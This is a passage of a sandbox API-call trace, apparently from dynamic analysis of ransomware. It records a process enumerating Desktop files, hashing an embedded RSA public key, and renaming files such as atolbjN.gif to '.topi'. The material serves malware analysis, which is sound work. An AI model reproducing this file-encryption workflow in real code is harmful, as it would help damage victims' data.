dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.347] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.348] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a6cee90, ftCreationTime.dwHighDateTime=0x1d5b74f, ftLastAccessTime.dwLowDateTime=0xf50306b0, ftLastAccessTime.dwHighDateTime=0x1d5b5d7, ftLastWriteTime.dwLowDateTime=0xf50306b0, ftLastWriteTime.dwHighDateTime=0x1d5b5d7, nFileSizeHigh=0x0, nFileSizeLow=0x58ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="atolbjN.gif", cAlternateFileName="")) returned 1 [0094.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.348] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0094.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.348] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\atolbjN.gif") returned=".gif" [0094.348] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\atolbjN.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\atolbjn.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.349] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=22701) returned 1 [0094.349] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.352] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5887, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.352] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.353] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.353] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.353] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.353] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x58ad, lpOverlapped=0x0) returned 1 [0094.353] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.353] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.353] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.353] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.353] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.354] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.354] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.354] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.354] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.354] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.354] GetLastError () returned 0x0 [0094.354] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.354] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.354] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.354] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.354] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.355] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.355] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58b0) returned 0x99f52d8 [0094.355] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.355] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x3193e68 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x320fab0 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3a90 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f70 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d39b8 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f88 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fb8 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fd0 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x31ce620 [0094.355] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x31ce620, Size=0x218) returned 0x3165e90 [0094.355] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.355] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fb8 | out: hHeap=0x680000) returned 1 [0094.355] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fd0 | out: hHeap=0x680000) returned 1 [0094.355] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.355] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.355] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8fd0 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d8fb8 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fd0 | out: hHeap=0x680000) returned 1 [0094.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fb8 | out: hHeap=0x680000) returned 1 [0094.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0094.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.356] GetCurrentThreadId () returned 0x8c4 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1550 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.357] GetCurrentThreadId () returned 0x8c4 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fb8 [0094.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.357] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fd0 [0094.357] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.358] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.358] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.358] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\atolbjN.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\atolbjn.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\atolbjN.gif.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\atolbjn.gif.topi")) returned 1 [0094.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.359] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.360] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdded0fb0, ftCreationTime.dwHighDateTime=0x1d5bf74, ftLastAccessTime.dwLowDateTime=0x6ac0a7d0, ftLastAccessTime.dwHighDateTime=0x1d5b8e5, ftLastWriteTime.dwLowDateTime=0x6ac0a7d0, ftLastWriteTime.dwHighDateTime=0x1d5b8e5, nFileSizeHigh=0x0, nFileSizeLow=0x6af8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bYBn.mp4", cAlternateFileName="")) returned 1 [0094.360] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bYBn.mp4") returned=".mp4" [0094.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bYBn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bybn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.360] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=27384) returned 1 [0094.360] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.363] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6ad2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.363] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.364] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.365] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.365] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.365] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.365] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.365] GetLastError () returned 0x0 [0094.365] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.365] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.365] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.365] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.365] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.365] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.365] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.365] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.365] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.365] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6b00) returned 0x99f52d8 [0094.365] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.365] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.365] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x3193e68 [0094.365] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x320fab0 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d39b8 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f88 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d37c0 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f40 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fd0 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fe8 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x31ce620 [0094.366] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x31ce620, Size=0x218) returned 0x3165e90 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.366] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fd0 | out: hHeap=0x680000) returned 1 [0094.366] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fe8 | out: hHeap=0x680000) returned 1 [0094.366] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.366] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.366] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8fe8 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d8fd0 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.366] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.366] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.366] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fe8 | out: hHeap=0x680000) returned 1 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fd0 | out: hHeap=0x680000) returned 1 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.367] GetCurrentThreadId () returned 0x8c4 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e15e0 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.367] RtlAllocateHeap 